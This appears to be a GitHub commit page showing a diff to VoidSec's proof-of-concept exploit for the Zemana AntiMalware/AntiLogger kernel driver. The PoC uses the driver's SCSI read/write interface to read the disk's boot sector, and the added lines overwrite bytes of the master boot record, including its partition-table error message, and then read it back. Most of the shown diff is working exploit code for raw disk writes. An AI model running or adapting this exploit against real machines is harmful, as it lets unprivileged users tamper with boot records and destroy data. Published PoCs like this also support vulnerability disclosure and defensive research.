Skip to content

Commit 7ecdf08

Browse files
VoidSecVoidSec
committed
update
1 parent e63cd90 commit 7ecdf08

File tree

2 files changed

+16
-4
lines changed

2 files changed

+16
-4
lines changed

windows/x64/kernel/Zemana_AntiMalware_AntiLogger/driver/zam64.sys.i64

0 Bytes
Binary file not shown.

windows/x64/kernel/Zemana_AntiMalware_AntiLogger/exploit/Zemana_AntiMalware_AntiLogger_SCSI_RW_PoC.cpp

Lines changed: 16 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -4,9 +4,9 @@ Exploit Author: Paolo Stagno aka VoidSec - voidsec@voidsec.com - https://voi
44
Date: 12/06/2023
55
Vendor Homepage: https://zemana.com/
66
Download: https://zemana.com/downloads/Zemana.AntiMalware.Setup.exe
7-
https://zemana.com/downloads/Zemana.AntiLogger.Setup.exe
8-
Affected Version: Zemana AntiMalware v. <= 3.2.28
9-
Zemana AntiLogger v. <= 2.74.204.664
7+
https://zemana.com/downloads/Zemana.AntiLogger.Setup.exe
8+
Affected Version: Zemana AntiMalware v. <= 3.2.28
9+
Zemana AntiLogger v. <= 2.74.204.664
1010
CVE: CVE-2023-XXXX
1111
Tested on: Windows 11 Pro x64 v.22621.1778
1212
Category: local exploit
@@ -166,18 +166,30 @@ int main(int argc, char** argv) {
166166
return -1;
167167
}
168168
std::cout << "\t[+] Disk ID: 0x" << *(ULONG32*)(lpInBuffer + 440) << std::endl;
169-
std::cout << "\t[+]SCSI disk dump" << std::endl;
169+
std::cout << "\t[+] SCSI disk dump" << std::endl;
170170
hex_dump(std::cout, lpInBuffer, sizeof(lpInBuffer));
171171

172172
std::cout << "\n[-] SCSI Disk Write" << std::endl;
173173
std::cout << "\t[-] Incrementing Disk ID" << std::endl;
174174
(*(ULONG32*)(lpInBuffer + 440))++;
175+
std::cout << "\t[-] Overwriting Partition Table Error Message with 'VoidSec'" << std::endl;
176+
memcpy(lpInBuffer + 0x163, "VoidSec", 7);
177+
175178
success = SCSI_RW(hDevice, 0, 0, lpInBuffer, TRUE);
176179
if (!success) {
177180
std::cout << "\t[!] Failed to write to SCSI disk. Error code: " << ::GetLastError() << std::endl;
178181
return -1;
179182
}
180183
std::cout << "\t[+] SCSI Write successful! Disk ID is now: 0x" << *(ULONG32*)(lpInBuffer + 440) << std::endl;
184+
185+
// reading back partition table
186+
success = SCSI_RW(hDevice, 0, 0, lpInBuffer, FALSE);
187+
if (!success) {
188+
std::cout << "\t[!] Failed to read from SCSI disk. Error code: " << ::GetLastError() << std::endl;
189+
return -1;
190+
}
191+
std::cout << "\t[+] SCSI disk dump" << std::endl;
192+
hex_dump(std::cout, lpInBuffer, sizeof(lpInBuffer));
181193

182194
CloseHandle(hDevice);
183195
return 0;

0 commit comments

Comments
 (0)